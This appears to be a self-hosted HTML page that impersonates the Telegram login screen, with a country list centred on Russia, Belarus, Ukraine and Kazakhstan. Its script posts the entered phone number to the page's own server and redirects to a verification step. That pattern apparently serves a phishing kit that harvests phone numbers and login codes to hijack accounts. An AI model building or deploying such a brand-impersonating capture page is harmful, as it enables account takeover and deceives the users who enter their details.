<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Telegram</title>
    <style>
        .telegram-logo {
            color: white;
            background-color: #cccccc;
            padding: 10px;
            border-radius: 5px;
        }
    </style>
    <link rel="stylesheet" href="/static/css/styles.css">
</head>
<body>
    <div class="login-container">
        <div class="telegram-logo">
            <img src="/static/img/telegram_logo.png" alt="Telegram Logo">
            <h1>Telegram</h1>
            <p>Please confirm your country code and enter your phone number</p>
        </div>
        <form id="login-form" class="login-form">
            <div class="country-selection">
                <label for="country">Select your country:</label>
                <select id="country" name="country">
                    <option value="Other" selected>Other</option>
                    <option value="Russia">Russia</option>
                    <option value="Belarus">Belarus</option>
                    <option value="Ukraine">Ukraine</option>
                    <option value="Kazakhstan">Kazakhstan</option>
                </select>
            </div>
            <div class="phone-input">
                <label for="phone">Phone number:</label>
                <input type="text" id="phone" name="phone" placeholder="Enter your phone number" required>
            </div>
            <div class="checkbox">
                <input type="checkbox" id="keep-signed-in" name="keep-signed-in">
                <label for="keep-signed-in">Keep me signed in</label>
            </div>
            <button type="submit">Login</button>
        </form>
    </div>
    <script>
        document.addEventListener('DOMContentLoaded', function() {
            console.log('DOM fully loaded and parsed');
            document.getElementById('login-form').addEventListener('submit', function(event) {
                event.preventDefault(); // Предотвращаем стандартное поведение формы
                var phoneNumber = document.getElementById('phone').value;
                console.log('Phone number entered: ' + phoneNumber);
                fetch('/submit_phone', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({ phone: phoneNumber })
                })
                .then(response => response.json())
                .then(data => {
                    console.log(data);
                    if (data.status === 'success') {
                        window.location.href = '/phone_verification/' + phoneNumber;
                    }
                })
                .catch(error => console.error('Error:', error));
            });
        });
    </script>
</body>
</html>
